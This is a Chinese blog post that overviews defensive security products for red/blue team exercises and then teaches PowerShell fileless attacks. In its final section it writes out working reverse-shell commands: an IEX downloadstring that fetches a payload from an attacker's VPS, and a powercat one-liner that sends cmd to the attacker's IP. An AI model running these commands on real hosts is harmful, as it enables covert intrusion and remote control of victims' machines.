2024HW --> 安全产品 Powershell无文件落地攻击

在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制...... 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)

目录

1.态势感知

2.EDR

3.蜜罐

4.沙箱

5.威胁情报平台

6.Powershell无文件落地攻击!!!


1.态势感知

所谓的态势感知,就是我们在电视剧或者电影中经常见到的大屏幕上的画面(对没错,就是这样,十分的酷炫)

通过态势感知系统,我们可以清晰的看见攻击的来源以及攻击方法以及攻击的时间等等..... 

像深信服的SIP态势感知系统,就是一个很好的态势感知案例(真的一目了然)

其工作原理就是通过在各个子公司,或者办公区的核心交换机上面装一个探针,然后将通过交换机的流量进行copy一份,然后实时传输到态势感知的系统上面,供响应的人员进行查看

大概就是这样

2.EDR

EDR(Endpoint Detection and Response)终端检测与响应分析

这个就是通过在你的办公的电脑上装一个软件,通过这样,将多台设备联合在一起,进行监控和实时探测的目的(难听一点就是监控着你每天在干嘛,有点那个啥的)

通过EDR,我们可以实现监视终端以检测可疑活动,并捕获可疑数据以进行安全取证及调查。

3.蜜罐

随着技术的发展,科技也是越来越成熟,蜜罐也是。(相信是每个黑客最痛恨的了吧)

比较出名的民用的蜜罐就应该是Hfish了吧

这个蜜罐挺厉害的,提供了各种如OA,gitlab,redis,以及一些出名端口如22,3306,7001等诱导黑客来攻击,当黑客攻击的时候,就"中了蜜罐"。

通过蜜罐,我们能获取黑客的IP(一般是代理),0DAY(能获得这个就收获大了),误导黑客的攻击方向,或者延缓他们的攻击脚步,当然了,说不定还能获取他们个人信息如手机号,微信号等等个人隐私(反正蜜罐效果还是不错的)

4.沙箱

这个的作用也很大,在日常生活中我们的好兄弟经常回给我们发一些如1个T的学习资料以及一些好看的东西等等!!

但是我们又不知道有没有病毒,那能怎么办呢??? 沙箱就诞生了

安全沙箱技术是一种用于隔离应用程序或进程的安全机制,它可以在计算机系统中创建一个受限的环境,以防止应用程序或进程对系统造成潜在的安全威胁

通过沙箱,我们可以对这个exe,文件等进行威胁分析,来查看它们是否会产生一些威胁的做法

就像这样

5.威胁情报平台

这个没什么说的,我直接推荐微步好吧(挺出名的)

你有什么子域名啊,ip啊,都可以往上面扔一下,说不定能得到一些对应的信息

好了,那么差不多咯???

不对   不能水文章,还得写点东西

那么就来讲一下一种很酷炫的攻击吧(从名字都知道很酷炫)

6.Powershell无文件落地攻击!!!

是不是听起来就很酷炫,那么下面我们就来讲解一下这个东西

传统的恶意软件(例如.exe)攻击感染一个系统之前会把恶意文件(例如exe)复制到目标磁盘中并修改注册表并连接到此文件来达到一个长期隐藏的目的,无文件落地攻击是指即不向磁盘写入可执行文件,而是以脚本形式存在计算机中的注册表子项目中,以此来躲避杀软的检测,那么绕过了传统防病毒(AV)寻找被保存到磁盘上的文件并扫描这些文件以确定它们是否恶意的查杀方法。

对于无文件落地攻击,一般分为以下这么几个步骤

1.远程加载恶意脚本
2.注入内存
3.写入注册表(或者自运行)

然而对于powershell

powershell作为微软windows系统自带的软件包,具有十分强大的功能,越来越多的攻击者选用powershell作为攻击手段。PowerShell的主要作用是从远程位置下载恶意文件到受害者主机中,然后使用诸如Start-Porcess、Invoke-Item或者Invoke-Expression(-IEX)之类的命令执行恶意文件,PowerShell也可以将远程文件直接下载到受害者主机内存中,然后从内存中执行

首先,我们来讲一下powershell无文件反弹shell

1.CS自带powershell_payload

这个反弹shell还是不错的!!!!

首先我们去生成一段powershell的payload,然后部署在我们自己的VPS

然后传上去,开一个http服务

然后我们去存在RCE的主机上直接执行以下的命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://你公网的ip:公网的端口/powershell.ps1'))"

而且在别人的服务器上面,是不会产生任何的文件的,这样,就能达到了无文件落地攻击的效果

2.NC联动powercat反弹shell

除了上面的做法,我们还可以通过nc来接受反弹的shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 你的公网ip -p 监听的端口 -e cmd

我们就能在公网看见我们的nc的shell了 

如果别人访问不到githu,那么我们最好就是去下载这个ps脚本吗,直接放在服务器上,效果也是一样的

除了以上,我们还有nishang配合powershell反弹shell ,Invoke-PowerShellTcp联动nc反弹shell

            

但是不管怎么样,我们都是通过powershell来实现了无文件落地的攻击的目的!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/309310.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

自动化收集Unity版本更新日志

自动化收集Unity版本更新日志 🍥功能介绍🥪食用手册填写配置开始搜集 🍨数据展示 🍥功能介绍 💡获取指定年份中所有的Unity版本更新日志。 💡根据指定字符串过滤。 💡.收集后自动保存成markdow…

Niobe开发板OpenHarmony内核编程开发——定时器

本示例将演示如何在Niobe Wifi IoT开发板上使用cmsis 2.0 接口进行定时器开发 Timer API分析 osTimerNew() /// Create and Initialize a timer./// \param[in] func function pointer to callback function./// \param[in] type \ref osTimerOnce …

Kafka 架构深入探索

目录 一、Kafka 工作流程及文件存储机制 二、数据可靠性保证 三 、数据一致性问题 3.1follower 故障 3.2leader 故障 四、ack 应答机制 五、部署FilebeatKafkaELK 5.1环境准备 5.2部署ELK 5.2.1部署 Elasticsearch 软件 5.2.1.1修改elasticsearch主配置文件 5.2…

事务隔离级别的无锁实现方式 -- MVCC

MVCC的全称是Multiversion Concurrency Control(多版本并发控制器),是一种事务隔离级别的无锁的实现方式,用于提高事务的并发性能,即事务隔离级别的一种底层实现方式。 在了解MVCC之前,我们先来回顾一些简单的知识点:…

终端工具命令行颜色配置(解决终端工具连上服务器之后,无颜色问题)

本期主题: 讲解使用mobaxterm等终端工具连上服务器,但是命令行没有颜色的问题 目录 1. 问题描述2. 原因解释3.测试 1. 问题描述 使用终端工具(Mobaxterm等)连上服务器之后,发现终端工具没有颜色,如下图&am…

API接口京东开放平台item_get-获得京东商品详情API接口根据商品ID查询商品标题价格描述等详情数据

京东商品详情API接口可以提供以下方面的信息: 商品基础信息:包括商品的标题、价格、描述、图片等基本信息,这是构建电商平台的基础数据。商品分类信息:帮助用户更好地了解商品所属的类别,便于商品筛选和查找。商品销售…

RK3568平台 驱动实现IIC设备读取十六位寄存器状态

一.项目需求 要求读取GVS2715这个IIC设置寄存器的值来获取版本号,GVS2715这个芯片是十六位寄存器。 当使用i2ctool工具读取十六位寄存器的时候,发现无法读取出来,读取的都是XXXX。 二.从零开始写IIC设备驱动读取十六位寄存器的状态 #includ…

CentOS 7安装Zookeeper

说明:本文介绍如何在CentOS 7操作系统下使用Zookeeper 下载安装 首先,去官网下载所需要安装的版本,我这里下载3.4.9版本; 上传到云服务器上,解压 tar -xvf zookeeper-3.4.9.tar.gz修改配置 进入Zookeeper目录下的co…

Spark-机器学习(1)什么是机器学习与MLlib算法库的认识

从这一系列开始,我会带着大家一起了解我们的机器学习,了解我们spark机器学习中的MLIib算法库,知道它大概的模型,熟悉并认识它。同时,本篇文章为个人spark免费专栏的系列文章,有兴趣的可以收藏关注一下&…

前端标记语言HTML

HTML(HyperText Markup Language)是一种用于创建网页的标准标记语言。它是构建和设计网页及应用的基础,通过定义各种元素和属性,HTML使得开发者能够组织和格式化文本、图像、链接等内容。 HTML的基本结构 文档类型声明&#xff0…

SpringBoot+FreeMaker

目录 1.FreeMarker说明2.SpringBootFreeMarker快速搭建Pom文件application.properties文件Controller文件目录结构 3.FreeMarker数据类型3.1.布尔类型3.2.数值类型3.3.字符串类型3.4.日期类型3.5.空值类型3.6.sequence类型3.7.hash类型 4.FreeMarker指令assign自定义变量指令if…

开源版中文和越南语贷款源码贷款平台下载 小额贷款系统 贷款源码运营版

后台 代理 前端均为vue源码,前端有中文和越南语 前端ui黄色大气,逻辑操作简单,注册可对接国际短信,可不对接 用户注册进去填写资料,后台审批,审批状态可自定义修改文字显示 源码免费下载地址抄笔记 (chaob…

详解构造函数

前言 希望这篇文章是有意义的,能够帮助初学者理清构造函数的概念,关系及误区。首先定义一个日期类,借助日期类讲解构造函数。 class Date {public:void Init(int year, int month, int day) //初始化数据的方法{_year year;_month month…

CDP7 下载安装 Flink Percel 包

下载链接:https://www.cloudera.com/downloads/cdf/csa-trial.html 点击后选择版本, 然后点击download now,会有一个协议,勾选即可,然后就有三个文件列表, 我这里是已经注册登录的状态,如果没…

64B/66B GT Transceiver 配置

一、前言 前一篇文章已经讲述了64B/66B的编码原理,此篇文章来配置一下7系列GT的64B/66B编码。并讲述所对应的例子工程的架构,以及部分代码的含义。 二、IP核配置 1、打开7 Series FPGAs Transceiver Wizards,选择将共享逻辑放置在example …

【面试题】s += 1 和 s = s + 1的区别

文章目录 1.问题2.发现过程3.解析 1.问题 以下两个程序真的完全等同吗? short s 0; s 1; short s 0; s s 1; 2.发现过程 初看s 1 和 s s 1好像是等价的,没有什么区别。很长一段时间内我也是这么觉得,因为当时学习c语言的时候教科书…

【数据挖掘】实验6:初级绘图

实验6:初级绘图 一:实验目的与要求 1:了解R语言中各种图形元素的添加方法,并能够灵活应用这些元素。 2:了解R语言中的各种图形函数,掌握常见图形的绘制方法。 二:实验内容 【直方图】 Eg.1&…

【linux深入剖析】深入理解软硬链接 | 动静态库的制作以及使用

🍁你好,我是 RO-BERRY 📗 致力于C、C、数据结构、TCP/IP、数据库等等一系列知识 🎄感谢你的陪伴与支持 ,故事既有了开头,就要画上一个完美的句号,让我们一起加油 目录 1.理解软硬链接1.1 操作观…

pyqt和opencv结合01:读取图像、显示

在这里插入图片描述 1 、opencv读取图像用于pyqt显示 # image cv2.imread(file_path)image cv2.cvtColor(image, cv2.COLOR_BGR2RGB)# 将图像转换为 Qt 可接受的格式height, width, channel image.shapebytes_per_line 3 * widthq_image QImage(image.data, width, hei…

vue3 uniapp微信登录

根据最新的微信小程序官方的规定,uniapp中的uni.getUserInfo方法不再返回用户头像和昵称、以及手机号 首先,需获取appID,appSecret,如下图 先调用uni.getUserInfo方法获取code,然后调用后台的api,传入code&…